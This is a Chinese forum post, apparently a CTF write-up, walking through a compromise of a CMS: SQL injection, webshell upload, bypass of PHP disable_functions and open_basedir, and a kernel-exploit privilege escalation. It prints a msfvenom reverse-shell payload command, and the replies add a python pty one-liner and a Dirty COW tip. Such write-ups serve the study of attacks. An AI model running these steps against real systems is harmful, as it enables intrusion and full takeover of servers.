拿shell+disable_functions绕过+目录突破+提权

kong   ·   发表于 2020-06-24 16:54:20   ·   CTF&WP专版

0x00前台拿webshell
前期正常信息收集,发现是个cms,然后百度了一波之前的漏洞,找到了延时注入。

一个一个的手工太累了,然后使用py脚本来跑。


把密文拿去MD5解密,得到管理密码。


在后台看到后台上传可以上传文件的类型


找到上传点,然后上传木马


连接到webshell,发现命令都是执行不了的。


在phpinfo里找到disable_functions函数,发现很多命令都被禁用了。


0x01绕过disable_functions
使用蚁剑自带插件成功绕过。


然后到tmp目录查找看看,找到了.sock路径。

把FPM/FCGI地址改为找到的路径,运行生成一个.antproxy.php文件。


连接.antproxy.php发现这个绕过只有一会的时间就会被断开,然后想着在上传木马到靶机,进行反弹shell。


0x02进行反弹shell
先把原来的删除这样然后重新生成。在这里每次重新连接.antproxy.php都要连接重新生成的.antproxy.php。

生成木马
使用msf生成木马,我这里使用的是监听80端口,LHOST是你要接收shell反弹回来的IP,-i 表示编码的次数。
msfvenom -p linux/x64/shell_reverse_tcp -i 5 LHOST=x.x.x.x LPORT=80 -f elf -o /root/shell.elf

然后直接把.elf木马放到目标上,在突破disable_functions的时候会有几分钟的时间可以输入命令。在自己接收反弹shell的机器上开启80监听,然后直接运行木马进行反弹。


0x03目录突破
发现有些目录是浏览不了的。


可以在shell目录下新建.user.ini文件添加open_basedir=:/绕过php.ini的全局限制。


再次访问


0x04提权
查看linux内核版本大于等于2.6.22,可以尝试CVE-2016-0728 提权(网上有很多相关的文章)


一开始编译出现错误,然后修改 PATH


然后运行

上面进行了目录的突破,然后我们还可以使用bash反弹。
找到文件写入bash反弹语句


监听端口。

用户名金币积分时间理由
Track-聂风 100.00 0 2020-06-28 17:05:46 支持,同学加油

打赏我,让我更有动力~

2 Reply   |  Until 2020-7-3 | 1042 View

mq
发表于 2020-6-30

先声明我不是喷子(doge head)
先给大佬点个赞,同时问个问题,也有个建议
问题:提权之后为什么还要反弹个shell出来?
建议:在为提权前或者提权后可以看看目标机器上是否运行了python并且普通用户具有执行权限,如果有的话可以使用python生成交互式shell,反弹得来的shell太丑了(个人看起来),具体为:python -c ‘import pty; pty.spawn(“/bin/bash”)’
建议:后边的bash反弹大佬选用的是pure-ftpd这个文件,如果这个文件是自启动并且root权限操纵的话那我无话可说,如果不是可以选择一个以root权限自启动的文件直接得到root权限

以上个人看法,也可以帮一些人解惑,大佬不要介意(狗头)

评论列表

  • 加载数据中...

编写评论内容

urfyyyy
发表于 2020-7-3

反弹tty,2.6.22脏牛秒提,会话打到msf里,就可以开心的玩耍了。
楼上说的挺对,可以用py来弹一个tty出来,不然你有时候提权成功了,su不了root
其余cve提权也是同理

个人理解,欢迎交流

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.